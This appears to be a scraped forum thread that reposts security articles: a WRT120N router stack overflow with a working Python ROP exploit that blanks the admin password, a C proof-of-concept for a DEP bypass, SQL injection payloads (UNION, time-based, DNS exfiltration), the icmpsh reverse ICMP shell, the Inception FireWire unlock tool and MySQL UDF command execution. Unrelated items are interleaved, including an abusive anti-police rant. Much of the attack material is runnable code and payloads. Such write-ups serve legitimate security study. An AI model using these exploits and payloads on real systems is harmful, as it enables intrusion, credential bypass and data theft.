Nytro

E fake

[h=1]WRT120N fprintf Stack Overflow[/h] By Craig | February 19, 2014 | With a good firmware disassembly and JTAG debug access to the WRT120N, it’s time to start examining the code for more interesting bugs. As we’ve seen previously, the WRT120N runs a Real Time Operating System. For security, the RTOS’s administrative web interface employs HTTP Basic authentication: 401 Unauthorized Most of the web pages require authentication, but there are a handful of URLs that are explicitly allowed to bypass authentication: bypass_file_list(“/cgi-bin/login /images/ /login…”); Full list of bypass files Any request whose URL starts with one of these strings will be allowed without authentication, so they’re a good place to start hunting for bugs. Some of these pages don’t actually exist; others exist but their request handlers don’t do anything (NULL subroutines). However, the /cgi/tmUnBlock.cgi page does have a handler that processes some user data: cgi_tmUnBlock function handler The interesting bit of code to focus on is this: [TABLE] [TR] [TD=class: gutter]1 [/TD] [TD=class: code]fprintf(request->socket, "Location %s\n\n", GetWebParam(cgi_handle, "TM_Block_URL")); [/TD] [/TR] [/TABLE] Although it at first appears benign, cgi_tmUnBlock‘s processing of the TM_Block_URL POST parameter is exploitable, thanks to a flaw in the fprintf implementation: fprintf Yes, fprintf blindly vsprintf‘s the supplied format string and arguments to a local stack buffer of only 256 bytes. Respect yourself. Don’t use sprintf. This means that the user-supplied TM_Block_URL POST parameter will trigger a stack overflow in fprintf if it is larger than 246 (sizeof(buf) – strlen(“Location: “)) bytes: [TABLE] [TR] [TD=class: gutter]1 [/TD] [TD=class: code]$ wget --post-data="period=0&TM_Block_MAC=00:01:02:03:04:05&TM_Block_URL=$(perl -e 'print "A"x254')" http://192.168.1.1/cgi-bin/tmUnBlock.cgi [/TD] [/TR] [/TABLE] Stack trace of the crash A simple exploit would be to overwrite some critical piece of data in memory, say, the administrative password which is stored in memory at address 0x81544AF0: Admin password at 0x81544AF0 The administrative password is treated as a standard NULL terminated string, so if we can write even a single NULL byte at the beginning of this address, we’ll be able to log in to the router with a blank password. We just have to make sure the system continues running normally after exploitation. Looking at fprintf‘s epilogue, both the $ra and $s0 registers are restored from the stack, meaning that we can control both of those registers when we overflow the stack: fprintf’s function epilogue There’s also this nifty piece of code at address 0x8031F634 that stores four NULL bytes from the $zero register to the address contained in the $s0 register: First ROP gadget If we use the overflow to force fprintf to return to 0x8031F634 and overwrite $s0 with the address of the administrative password (0x81544AF0), then this code will: Zero out the admin password Return to the return address stored on the stack (we control the stack) Add 16 to the stack pointer This last point is actually a problem. We need the system to continue normally and not crash, but if we simply return to the cgi_tmUnBlock function like fprintf was supposed to, the stack pointer will be off by 16 bytes. Finding a useful MIPS ROP gadget that decrements the stack pointer back 16 bytes can be difficult, so we’ll take a different approach. Looking at the address where fprintf should have returned to cgi_tmUnblock, we see that all it is doing is restoring $ra, $s1 and $s0 from the stack, then returning and adding 0×60 to the stack pointer: cgi_tmUnblock function epilogue We’ve already added 0×10 to the stack pointer, so if we can find a second ROP gadget that restores the appropriate saved values for $ra, $s1 and $s0 from the stack and adds 0×50 to the stack pointer, then that ROP gadget can be used to effectively replace cgi_tmUnblock‘s function epilogue. There aren’t any obvious gadgets that do this directly, but there is a nice one at 0x803471B8 that is close: Second ROP gadget This gadget only adds 0×10 to the stack pointer, but that’s not a problem; we’ll set up some additional stack frames that will force this ROP gadget return to itself five times. On the fifth iteration, the original values of $ra, $s1 and $s0 that were passed to cgi_tmUnblock will be pulled off the stack, and our ROP gadget will return to cgi_tmUnblock‘s caller: ROP stack frames and relevant registers With the register contents and stack having been properly restored, the system should continue running along as if nothing ever happened. Here’s some PoC code (download): import sysimport urllib2 try: target = sys.argv[1] except IndexError: print "Usage: %s <target ip>" % sys.argv[0] sys.exit(1) url = target + '/cgi-bin/tmUnblock.cgi' if '://' not in url: url = 'http://' + url post_data = "period=0&TM_Block_MAC=00:01:02:03:04:05&TM_Block_URL=" post_data += "B" * 246 # Filler post_data += "\x81\x54\x4A\xF0" # $s0, address of admin password in memory post_data += "\x80\x31\xF6\x34" # $ra post_data += "C" * 0x28 # Stack filler post_data += "D" * 4 # ROP 1 $s0, don't care post_data += "\x80\x34\x71\xB8" # ROP 1 $ra (address of ROP 2) post_data += "E" * 8 # Stack filler for i in range(0, 4): post_data += "F" * 4 # ROP 2 $s0, don't care post_data += "G" * 4 # ROP 2 $s1, don't care post_data += "\x80\x34\x71\xB8" # ROP 2 $ra (address of itself) post_data += "H" * (4-(3*(i/3))) # Stack filler; needs to be 4 bytes except for the # last stack frame where it needs to be 1 byte (to # account for the trailing "\n\n" and terminating # NULL byte) try: req = urllib2.Request(url, post_data) res = urllib2.urlopen(req) except urllib2.HTTPError as e: if e.code == 500: print "OK" else: print "Received unexpected server response:", str(e) except KeyboardInterrupt: pass Logging in with a blank password after exploitation Arbitrary code execution is also possible, but that’s another post for another day. Sursa: WRT120N fprintf Stack Overflow - /dev/ttyS0

Inception Inception is a FireWire physical memory manipulation and hacking tool exploiting IEEE 1394 SBP-2 DMA. The tool can unlock (any password accepted) and escalate privileges to Administrator/root on almost* any powered on machine you have physical access to. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe interfaces. Inception aims to provide a stable and easy way of performing intrusive and non-intrusive memory hacks on live computers using FireWire SBP-2 DMA. It is primarily intended to do its magic against computers that utilize full disk encryption such as BitLocker, FileVault, TrueCrypt or Pointsec. There are plenty of other ways to hack a machine that doesn’t pack encryption. Inception is also useful for incident response teams and digital forensics experts when faced with live machines. Inception’s main mode works as follows: By presenting a Serial Bus Protocol 2 (SBP-2) unit directory to the victim machine over the IEEE1394 FireWire interface, the victim operating system thinks that a SBP-2 device has connected to the FireWire port. Since SBP-2 devices utilize Direct Memory Access (DMA) for fast, large bulk data transfers (e.g., FireWire hard drives and digital camcorders), the victim lowers its shields and enables DMA for the device. The tool now has full read/write access to the lower 4GB of RAM on the victim. Once DMA is granted, the tool proceeds to search through available memory pages for signatures at certain offsets in the operating system’s password authentication modules. Once found, the tool short circuits the code that is triggered if an incorrect password is entered. An analogy for this operation is planting an idea into the memory of the machine; the idea that every password is correct. In other words, the nerdy equivalent of a memory inception. After running the tool you should be able to log into the victim machine using any password. The in-memory patching is non-persistent, and a reboot will restore the normal password functionality. This contributes to a key property of Inception: It’s stealthy. You can also use Inception to elevate privileges on (almost) any machine you have physical access to. As the tool patches the inner authentication mechanism in the OS, you can elevate your privileges to Local Adminstrator / root by using the Windows runas or Linux/OS X sudo su -s commands. As of version 0.3.1, it is able to unlock Windows 8.0-1, Windows 7 SP0-1, Vista SP0 and SP2, Windows XP SP2-3, Mac OS X Mavericks, Snow Leopard, Lion and Mountain Lion, Ubuntu 11.04, 11.10, 12.04, 12.10, 13.04, Linux Mint 11, 12 and 13 x86 and x64-bit machines. Signatures are added by request. Requirements Inception requires: A unix-flavor operating system to perform the attack from: Linux with the ‘Juju’ IEEE FireWire stack (Ubuntu 11 and higher and BackTrack 5 is known to work) Mac OS X (via IOkit, not recommended as IOkit is notoriously buggy at the moment) [*]Python 3 (http://www.python.org) [*]libforensic1394 (https://freddie.witherden.org/tools/libforensic1394/) [*]A FireWire/Thunderbolt/ExpressCard/PC Card interface at both machines. If you don’t have a native FireWire port, you can buy an adapter to hotplug one. The tool works over anything that expands the PCIe bus Download The latest development version can always be fetched from GitHub. Installation You should be able to run the tool without any installation (except the dependencies) on Mac OS X and Linux operating systems. Please be referred to the README file in libforensic1394 for installation of the libraries and FireWire pro-tips. Sursa: Inception | Break & Enter

PROTESTE VIOLENTE la Kiev: 16 oameni au fost uci?i. Vitali Kliciko s-a întâlnit cu Ianukovici: "Pre?edintele a cerut evacuarea Pie?ei Independen?ei". Trupele antirevolt? au lansat un nou asalt - LIVE VIDEO, GALERIE FOTO - Mediafax

ACAB. De vina pentru asta sunt politistii, sclavii jegosilor, mancatorii de cacat.

Play Flappy Bird Highscore: 1337 Challenge: schimbati highscore. (e usor)

[h=1] Insight on UNION query SQL injection[/h] Last week I wrote about DBMS fingerprint through inband SQL injection (also known as UNION query SQL injection) assuming that a web application parameter is affected by such type of SQL injection threat. Today I will keep the same scenario to focus on the detection of the inband SQL injection vulnerability, which is a prerequirement to exploit it performing the DBMS fingerprint and any other possible attack. There are mainly two techniques to detect if the vulnerable URL parameter is affected by an inband SQL injection vulnerability: UNION ALL SELECT NULL ORDER BY UNION ALL SELECT NULL The trick here is to perform the HTTP request taking advantage of the SQL syntax standard UNION ALL statement. Appending to the vulnerable parameter the UNION ALL SELECT NULL statement N times as long as we do not get any DBMS error messages. Common DBMS error messages when the occurences of NULL differ from the number of table columns are: MySQL: The used SELECT statements have a different number of columnsPostgreSQL: each UNION query must have the same number of columnsMicrosoft SQL Server: All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target listsOracle: ORA-01789: query block has incorrect number of result columnsIn our scenario at first request (with only one NULL) we will get a DBMS error message (similar to one of the aboves) or a blank page (if the administrator configured the web server not to return error messages), so we will request http://example/index.php?id=1 UNION ALL SELECT NULL, NULL and we will get a normal page, without any DBMS error message: the remote SELECT query is on a table with two columns and we can append data through the UNION ALL SELECT statement. ORDER BY This technique consists in performing the HTTP request taking advantage of the SQL syntax standard ORDER BY statement. Appending to the vulnerable parameter the ORDER BY NUM statement incrementing the number NUM as long as we do not get any DBMS error messages. Common DBMS error messages when the number NUM is greather than the number of table columns are: MySQL: Unknown column 'NUM' in 'order clause'PostgreSQL: ORDER BY position NUM is not in select listMicrosoft SQL Server: The ORDER BY position number NUM is out of range of the number of items in the select listOracle: ORA-01785: ORDER BY item must be the number of a SELECT-list expressionIn our scenario at first request (http://example/index.php?id=1 ORDER BY 1) we will not get the normal page (the query output will be sorted alphabetically based on the first table column values), so we will request http://example/index.php?id=1 ORDER BY 2 and we will get again a normal page. Now we already know that the table has two or more columns. Now requesting http://example/index.php?id=1 ORDER BY 3 we will get a DBMS error message (similar to one of the aboves) or a blank page (if the administrator configured the web server not to return error messages): the remote SELECT query is on a table with two columns and we can append data through the UNION ALL SELECT statement. EXPLOITING Both techniques are valid, but probably ORDER BY is more reliable on some custom DBMS/web application settings where, for example, NULL is not allowed as column type: quite rare case, but it can happens. Once we know how many columns there are in the table we have to check if the inband SQL injection is effectively visible (exploitable). In our scenario we can request http://example/index.php?id=1 UNION ALL SELECT NULL, '1234' and if the string 1234 appears in the HTML source code of the HTTP response page, we have an exploitable SQL injection. Remember to correctly encode with a DBMS CHAR() or similar function the strings to evade magic_quotes_gpc and some other security settings. I will illustrate some possible security settings evasion techniques in a future post. Now that we have an exploitable inband SQL injection we are ready to take advantage of this threat in our penetration test, for example performing a remote DBMS fingerprint [1] [2], usually the second step when exploiting this web applications vulnerability. NOTES The ALL is strongly advised to evade DISTINCT if present in the original web application SELECT query. The columns entries data type must fit: usually NULL fits all DBMS data types. The point here is to find a string (depending on the remote DBMS varchar, bpchar, etc) where inject our query. In our scenario being the remote DBMS MySQL it will work also in the first column even if it is an integer (int) because MySQL is not too restrictive in data types matching. In case the web application SELECT statement is similar to "SELECT id, name FROM testtable WHERE id=" . $_GET['id'] . " LIMIT 0, 1" we can evade the SQL syntax LIMIT by commenting our own injected query at the end, for instance requesting http://example/index.php?id=1 UNION ALL SELECT NULL, NULL-- where '--' starts a valid SQL comment in MySQL, Microsoft SQL Server and others DBMS. Implementation on sqlmap code: inband SQL injection library Posted 11th July 2007 by Bernardo Damele Sursa: Bernardo Damele A. G.: Insight on UNION query SQL injection

Data Retrieval over DNS in SQL Injection Attacks Miroslav Štampar AVL-AST d.o.o., Zagreb, Croatia miroslav.stampar@avl.com Abstract This paper describes an advanced SQL injection technique where DNS resolution process is exploited for retrieval of malicious SQL query results. Resulting DNS requests are intercepted by attackers themselves at the controlled remote name server extracting valuable data. Open source SQL injection tool sqlmap [1] has been adjusted to automate this task. With modifications done, attackers are able to use this technique for fast and low-profile data retrieval, especially in cases where other standard ones fail. Introduction Exfiltration is a military term for removal of assets from within enemy territory by covert means. It now has an excellent modern usage in computing, meaning the illicit extraction of data from a system. The most covert data extraction method is considered to be the Domain Name Server (DNS) exfiltration [2]. This method can even be used on systems without a public network connection by resolving domain name queries outside the perimeter of trusted hosts through a series of internal and external name servers. DNS is a relatively simple protocol. Both the query made by a DNS client and the corresponding response provided by a DNS server use the same basic DNS message format. With the exception of zone transfers, which use TCP for the sake of reliability, DNS messages are encapsulated within a UDP datagram. To someone monitoring a machine with a tool like Wireshark [3], a covert channel implemented over DNS would look like a series of little blips that flash in and out of existence [4]. The act of relaying DNS queries from secure systems to arbitrary internet-based name servers forms the basis of this uncontrolled data channel. Even if we assume that connections to public networks are not allowed, if the target host is able to resolve arbitrary domain names, data exfiltration is possible via forwarded DNS queries [5]. When other faster SQL injection (SQLi) data retrieval techniques fail, data is usually retrieved in bit-by-bit manner, which is very noisy1 and time consuming process. Thus, attackers will typically need tens of thousands of requests to retrieve content of a regular sized table. What is going to be described is the technique where attackers can retrieve results for malicious SQL queries (e.g. administrator password) by provoking specially crafted DNS requests from vulnerable Database Management System (DBMS) and intercepting those at the other end, transferring dozens of resulting characters per single iteration. Download: http://arxiv.org/pdf/1303.3047.pdf

[h=1]Reverse connection: ICMP shell[/h] Background Sometimes, network administrators make the penetration tester's life harder. Some of them do use firewalls for what they are meant to, surprisingly!Allowing traffic only onto known machines, ports and services (ingress filtering) and setting strong egress access control lists is one of these cases. In such scenarios when you have owned a machine part of the internal network or the DMZ (e.g. in a Citrix breakout engagement or similar), it is not always trivial to get a reverse shell over TCP, not to consider a bind shell. However, what about UDP (commonly a DNS tunnel) or ICMP as the channel to get a reverse shell? ICMP is the focus on this post. Surfing the Net I found two handy tools to get a reverse shell over ICMP: soicmp - Developed in Python. Some useful features like the possibility to run soicmp daemon on multiple ethernet interfaces simultaneously handling multiple client connections. Unfortunately it uses RAW_SOCKETS on both client and server. You'll need the highest system privileges (root / administrator) to successfully run it on both endpoints. This means that you need root privileges onto the target system that you have owned, which might not always be the case. It is cross-platform. Also, it looks to me that it is unmaintained as of 2006-10-26. icmpshell - Developed in C. As per soicmp, it uses raw sockets on both the client and server side, therefore root privileges are required to use this program. It works on POSIX systems only, no support for Windows. Also, it looks to me that it is unmaintained as of 2002-02-06. icmpsh Last year a friend of mine coded a tool called icmpsh. It implements the reverse ICMP shell concept very well. The main advantage over the other open source tools is that it does not require administrative privileges to run onto the target machine. I spent some time playing with the tool and was immediately impressed. It is clean, easy and portable. The slave (client) runs on the target machine, it is written in C and works on Windows only whereas the master (server) can run on any platform as it has been implemented in C and Perl by Nico. I ported it to Python too. The reason for the Python port is that I wrapped it into sqlmap too. As of version 0.9 stable you can either establish the out-of-band connection via TCP with Metasploit or via ICMP with icmpsh - switch --os-pwn. Features Open source software - primarily coded by Nico, forked by me. Client/server architecture. The master is portable across any platform that can run either C, Perl or Python code. The target system has to be Windows because the slave runs on that platform only for now. The user running the slave on the target system does not require administrative privileges. Example Running icmpsh slave on target system (192.168.136.129) by specifying the master IP 192.168.136.1 Running icmpsh master on attacker machine (192.168.136.1) and issuing two OS commands onto the target system (192.168.136.129) Response packet from icmpsh slave containing output of issued command whoami The forked tool can be found on my GitHub at https://github.com/inquisb/icmpsh. Feedback is always welcome! Posted 15th April 2011 by Bernardo Damele Sursa: Bernardo Damele A. G.: Reverse connection: ICMP shell

DEP bypass with SetProcessDEPPolicy() Data Execution Prevention (DEP) was introduced in Windows XP SP2 and is included in Windows XP Tablet PC Edition 2005, Windows Server 2003 Service Pack 1 and later, Windows Vista Service Pack 0 and later, and Windows Server 2008 Service Pack 0 and later, and all newer versions of Windows. Hardware-enforced DEP, for CPUs that support NX (AMD) or XD (Intel) bits, enforces non-executable pages, basically it marks the stack/part of the stack as non-executable, thus preventing the execution of arbitrary shellcode residing on the stack. When the processor/system has NX/XD support/enabled, then Windows DEP is hardware DEP. Compilers such as Visual Studio C++ offer a link flag (/NXCOMPAT) that will enable applications for DEP protection. It's enabled by default since it was introduced in Visual Studio 2005. DEP can be circumvented in a number of ways by an attacker while exploiting a buffer overflow vulnerability to successfully achieve arbitrary command execution or, generally speaking, "successful shellcode run" when it resides on the stack. Some of these techniques are: Return-to-libc with a call to WinExec() widely covered in many papers and slides. ZwProtectVirtualMemory researched and explained on John's blog. NtSetInformationProcess initially researched by skape and Skywing and explained in an Uninformed article titled Bypassing Windows Hardware-enforced Data Execution Prevention. This is the widely known and used technique in most of publicly available exploits that bypass hardware-enforced DEP. SetProcessDEPPolicy, discussed in this blog post. SetProcessDEPPolicy() API has been "silently" added to Windows Vista SP1, Windows XP SP3 and Windows Server 2008. Michael Howard wrote a post on his blog back in early 2009 on how to use this function to set DEP for the current process from a developer perspective; I found it fairly well documented on MSDN too. It has also been mentioned back in summer 2008 by Alexander Sotirov and Mark Dowd in their Black Hat USA presentation titled Bypassing Browser Memory Protections. Apart from these references, I did not find on the Internet any proof of concept demonstrating in practice how to abuse this API while exploiting a buffer overflow vulnerability to bypass hardware-enforced DEP so I wrote the following proof of concept and hope it might be of help to other people too. In my opinion this technique is the simplest among the ones I have mentioned: it does not require any stack or registers alignment to be in place before the function is called. The only drawback is that it is not supported on Windows 2003 My test environment is a Windows XP Professional SP3 English updated on December 9, 2009 with DEP manually set to OptOut so enabled for all processes except the ones that are put in the exception list and the following proof of concept is not. DEP manually set to OptOut on Windows XP with no exceptions The source code has been compiled with Microsoft Visual C++ 2008 Express Edition in Release mode with the default flags. This includes /NXCOMPAT and /GS flags. Buffer Security Check (stack cookie, /GS flag) does not need to be bypassed in this specific case because the string buffer that we are going to overflow, buf, is long 4 bytes, so the compiler does not add the stack cookie to the useSetProcessDEPPolicy() function for performance reasons. Remember that strict_gs_check pragma by default is turned off. The following screenshot of Immunity Debugger shows that the shellcode (INT 3 instruction only in this PoC) has been successfully executed after DEP has been disabled abusing SetProcessDEPPolicy(). If DEP was not disabled, an Access Memory Violation would have been raised and the process would have been terminated. Follows the proof of concept: /*This is a proof of concept of buffer overflow exploitation with DEP bypass on Windows XP Professional SP3 english updated on December 9, 2009 with DEP manually set to OptOut so enabled for all processes, except the ones that are put in the exception list and this program is not. This source has been compiled with Microsoft Visual C++ 2008 Express Edition in Release mode with the default flags. This includes /NXCOMPAT and /GS. Buffer Security Check (stack cookie, /GS flag) does not need to be bypassed because the string buffer, buf, in this example is long 4 bytes, so the compiler does not add the GS cookie to the useSetProcessDEPPolicy() function. Remember that strict_gs_check pragma by default is turned off. References: * 'New NX APIs added to Windows Vista SP1, Windows XP SP3 and Windows Server 2008' by Michael Howard, http://blogs.msdn.com/michael_howard/archive/2008/01/29/new-nx-apis-added-to-windows-vista-sp1-windows-xp-sp3-and-windows-server-2008.aspx * SetProcessDEPPolicy Function, http://msdn.microsoft.com/en-us/library/bb736299%28VS.85%29.aspx Feel free to write me for comments and questions, Bernardo Damele A. G. <bernardo.damele@gmail.com> */ #include <windows.h> #include <stdlib.h> void useSetProcessDEPPolicy() { char buf[4]; /* Overflow the string buffer and EBP register. */ strcpy(buf, "AAAABBBB"); /* SetProcessDEPPolicy() API has been added to Windows Vista SP1, Windows XP SP3 and Windows Server 2008 and can be abused by an attacker while exploiting a buffer overflow vulnerability to disable hardware-enforced DEP (NX/XD bit) for the running process. Overwrite EIP with the address of SetProcessDepPolicy() API, which is 0x7c8622a4 on a Windows XP SP3 English 32bit system updated on December 9, 2009. NOTE: You might need to adapt it depending on your system patch level. */ memcpy(buf+8, "\xa4\x22\x86\x7c", 4); /* Return address of SetProcessDepPolicy(). Use an address of a JMP ESP instruction in kernel32.dll to jump to our shellcode on the top of the stack. NOTE: You might need to adapt it depending on your system patch level. */ memcpy(buf+12, "\x13\x44\x87\x7c", 4); /* Argument for SetProcessDepPolicy(). 0x00000000 turn off DEP for this process. */ memcpy(buf+16, "\x00\x00\x00\x00", 4); /* The shellcode to be executed after DEP has been disabled. For instance, a breakpoint (INT 3 instruction) to call the debug exception handler which will pause the process. */ memcpy(buf+20, "\xcc", 1); } int main() { useSetProcessDEPPolicy(); return 0; } This source code can also be found here. Posted 9th December 2009 by Bernardo Damele Sursa: Bernardo Damele A. G.: DEP bypass with SetProcessDEPPolicy()

[h=1]Command execution with a MySQL UDF[/h]Modern database management systems are powerful applications: they provide several instruments to interact with the underlying operating system. On MySQL it is possible to create a User-Defined Function to execute commands on the underlying operating system. Marco Ivaldi demonstrated that some years ago. His raptor_udf2.c works well, but it has two limitations: It is not MySQL 5.0+ compliant because it does not follow the new guidelines to create a proper UDF. It calls C function system() to execute the command and returns always integer 0. These limitations make the UDF almost useless on recent MySQL server installations if the database administrator wants to get the exit status of the command as UDF output or the command standard output itself. I recently came across an open repository of MySQL User-Defined Functions maintained by Roland Bouman and other developers. One of their codes kept my attention: lib_mysqludf_sys (version 0.0.2) which implements three different functions to interact with the underlying environement: sys_exec: executes an arbitrary command, and can thus be used to launch an external application. sys_get: gets the value of an environment variable. sys_set: create an environment variable, or update the value of an existing environment variable. The first function can be used to execute operating system commands and has two advantages over raptor's UDF: It is MySQL 5.0+ compliant and it compiles on both Linux as a shared object and on Windows as a dynamic-link library. It returns the exit status of the executed command. However, none of these two functions return the command standard output so I took some time to patch this last source code adding a sys_eval() UDF to return the standard output of the command if it success, NULL otherwise. The patched source code can be found on sqlmap subversion repository here and a single patch file for the original lib_mysqludf_sys version 0.0.2 is available here. Usage example: [/FONT][/FONT]$ wget --no-check-certificate https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.tar.gz $ tar xfz lib_mysqludf_sys_0.0.3.tar.gz $ cd lib_mysqludf_sys_0.0.3 $ sudo ./install.sh Compiling the MySQL UDF gcc -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o /usr/lib/lib_mysqludf_sys.so MySQL UDF compiled successfully Please provide your MySQL root password Enter password: MySQL UDF installed successfully $ mysql -u root -p mysql Enter password: [...] mysql> SELECT sys_eval('id'); +--------------------------------------------------+ | sys_eval('id') | +--------------------------------------------------+ | uid=118(mysql) gid=128(mysql) groups=128(mysql) | +--------------------------------------------------+ 1 row in set (0.02 sec) mysql> SELECT sys_exec('touch /tmp/test_mysql'); +-----------------------------------+ | sys_exec('touch /tmp/test_mysql') | +-----------------------------------+ | 0 | +-----------------------------------+ 1 row in set (0.02 sec) mysql> exit Bye $ ls -l /tmp/test_mysql -rw-rw---- 1 mysql mysql 0 2009-01-16 23:18 /tmp/test_mysql[FONT=trebuchet ms][FONT=courier new] UPDATE on January 25, 2009: Roland Bouman uploaded to the MySQL User-Defined Functions repository my patched version of lib_mysqludf_sys. He also updated its manual page. You can now get version 0.0.3 also from his repository. PacketStormSecurity.org and milw0rm.com mirrored it here and here. Posted 16th January 2009 by Bernardo Damele Sursa: Bernardo Damele A. G.: Command execution with a MySQL UDF

Recycle Bin Forensics An icon on the Windows desktop represents a directory in which deleted files are temporarily stored. This enables you to retrieve files that you may have accidentally deleted. From time to time, you’ll want to purge the recycle bin to free up space on your hard disk. You can also configure Windows so that it doesn’t use the recycle bin at all, but then you won’t be able to retrieve accidentally deleted files. When a file is deleted in the Microsoft Windows operating system, it doesn’t delete it permanently; it is stored in the recycle bin. If a user wants to restore the deleted file from the recycle bin, it can be done. If the user holds the shift key at the time of deleting a file, then the file will be deleted permanently without being stored in the recycle bin. In this case, the file is moved to a hidden, system folder where it is renamed and stored until further instructions are given as to what is to happen to the file. From the forensic point of view, the recycle bin is a gold mine for gathering evidence, clues, etc. By analyzing the recycle bin, we can recover useful data. To understand how the information files are structured and how the naming convention works, there must first be an understanding of how the recycle bin works. When a user “deletes” a file in Windows, the file itself is not actually deleted. The file at this point is copied into the recycle bin’s system folder, where it is held until the user gives further instructions on what to do with the file. This location varies, depending on the version of Windows the user is running. The table below shows locations from both past versions of Windows as well as Windows Vista. Here we will see how to analyze the INFO2 file for the Windows XP operating system. First check out the Recycler folder on C drive. The Recycler folder is a hidden directory, so we have to make some changes in the folder options to view that directory. Open “Folder Options,” then select “Show hidden files and folders” under the “Hidden files and folders” section. Uncheck “Hide protected operating system files” and you are done. Once the changes have been made, browse the C drive and you can see the Recycler folder clearly. Inside the Recycler folder, there’ll be a another folder with a name like “S-1-5-21-1078081533-1957994488-1343024091-1003? or similar. This will be generated for every separate user. In our case, we have only one user in this system; that’s why we have only one. Now navigate to this directory via the command prompt and type dir /a to view all files and folders. In the below figure we can see there is an INFO2 file. Just extract that file to the different location. We can’t normally open that file, so we will use a tool called Rifiuti. Rifiuti is a recycle bin forensic analysis tool. Rifiuti, the Italian word meaning “trash,” was developed to examine the contents of the INFO2 file in the recycle bin. Next put the INFO2 file inside the Rifiuti folder and run rifiuti.exe via the command prompt. We can see the Rifiuti usage command after running the rifiuti.exe. Now type in rifiuti.exe INFO2 >result.txt After running the command, the program will create a result.txt file in the rifuiti folder. Open the result.txt file. Now we can clearly see the details of every files. The deleted time of the file, from which drive it was deleted, the drive number and the file size. References: McAfee—Antivirus, Encryption, Firewall, Email Security, Web Security, Risk & Compliancedownloads/free-tools/rifiuti.aspx What is INFO2 File Hidden in Recycled or Recycler Folder? • Raymond.CC By Rohit Shaw|February 12th, 2014 Sursa: Recycle Bin Forensics - InfoSec Institute

[h=1]Free Password Hash Cracker[/h] [h=2]ow CrackStation Works[/h] CrackStation uses massive pre-computed lookup tables to crack password hashes. These tables store a mapping between the hash of a password, and the correct password for that hash. The hash values are indexed so that it is possible to quickly search the database for a given hash. If the hash is present in the database, the password can be recovered in a fraction of a second. This only works for "unsalted" hashes. For information on password hashing systems that are not vulnerable to pre-computed lookup tables, see our hashing security page. Crackstation's lookup tables were created by extracting every word from the Wikipedia databases and adding with every password list we could find. We also applied intelligent word mangling (brute force hybrid) to our wordlists to make them much more effective. For MD5 and SHA1 hashes, we have a 190GB, 15-billion-entry lookup table, and for other hashes, we have a 19GB 1.5-billion-entry lookup table. You can download CrackStation's dictionaries here, and the lookup table implementation (PHP and C) is available here. https://crackstation.net/

Time-Based Blind SQL Injection with Heavy Queries Published: September 12, 2007 By Chema Alonso, Microsoft Security MVP Introduction This article describes how attackers take advantage of SQL Injection vulnerabilities by using time-based blind SQL injection with heavy queries. Our goal is to highlight the need for establishing secure development best practices for Web applications instead of relying only on the security provided by the perimeter defenses. This article shows exploit examples for Microsoft SQL Server and Microsoft Access database engines, but the present technique is applicable to any other database product in the market. Time-Based Blind SQL Injection The first references to “blind attacks” can be found in Chris Anley’s June 2002 paper “(More) Advanced SQL Injection” [1], in which he calls attention to the possibility of creating such attacks -- in this specific case, time-based, one of the less common. Chris gives some examples of blind SQL injection techniques: <<•••••• if (ascii(substring(@s, @byte, 1)) & ( power(2, @BIT))) > 0 waitfor delay '0:0:5' …it is possible to determine whether a given bit in a string is '1' or ’0’.That is, the above query will pause for five seconds if bit @BIT' of byte @byte' in string '@s' is '1.' For example, the following query: declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s, 1, 1)) & ( power(2, 0))) > 0 waitfor delay '0:0:5' will pause for five seconds if the first bit of the first byte of the name of the current database is 1. As these examples show, the information is extracted from the database using a vulnerable parameter. Code is then injected to generate a delay in response time when the condition is true. After this first reference, blind SQL injection techniques continued to be studied with most techniques generating error messages from the attack system, because of the simplicity, quick execution, and extension of showing an error message versus delaying the database. One year later, in September 2003, Ofer Maor and Amichai Shulman published the paper “Blindfolded SQL Injection” [2]. Here, they analyze different ways to identify a vulnerable parameter on a SQL Injection system, even when the information processed and returned by the system is not visible. At the 2004 BlackHat Conference, Cameron Hotchkies presented his paper “Blind SQL Injection Automation Techniques” [3]. He proposed alternative methods to automate the exploitation of a Blind SQL Injection vulnerable parameter, using different custom tools. He suggested three different solutions for the automation: (1) Searching for keywords on positive and negative results; (2) Using MD5 signatures to discriminate positive and negative results; (3) Using textual difference engine. He also introduced SQueal, an automatic tool to extract information through Blind SQL Injection, which evolved later to another tool called Absinthe [4]. In September 2005, David Litchfield published the article “Data Mining with SQL Injection and Inference” [5], where he discussed the time-based inference techniques, and proposed other ways to obtain time delays using calls to stored procedures, such as xp_cmdshell on MS SQL Server to do a ping. xp_cmdshell ‘ping –n 10 127.0.0.1’ ? application paused 10 seconds. Time-based techniques can be extended to any action performed by a stored procedure and able to generate a time delay or any other measurable action. In December 2006, Ronald van den Heetkamp published the “SQL Injection Cheat Sheet” [6], including Blind SQL Injection tricks for MySQL with some examples based on benchmark functions that can generate time delays. For instance: SELECT BENCHMARK(10000000,ENCODE('abc','123')); [around 5 sec] SELECT BENCHMARK(1000000,MD5(CHAR(116))) [ around 7 sec] Example: SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login A recent exploit [7], published in June 2007 at http://www.milw0rm.com (a Web site dedicated to exploits and security) shows how this technique could be used to attack a game server called Solar Empire: ¡$sql="F***You'),(1,2,3,4,5,(SELECT IF (ASCII (SUBSTRING(se_games.admin_pw, ".$j.", 1)) =".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM se_games))/*"; As the studies of the time-based Blind SQL Injection techniques are moving forward, some new tools have been created, such as SQL Ninja [8], which uses the Wait-for method for Microsoft SQL Server engines, or SQL PowerInjector[9], which implements the Wait-for method for Microsoft SQL Server Database engines, Benchmark functions for MySQL engines, and an extension of the Wait-for method for Oracle engines, using calls to DBMS_LOCK methods. Articol complet: Time-Based Blind SQL Injection with Heavy Queries

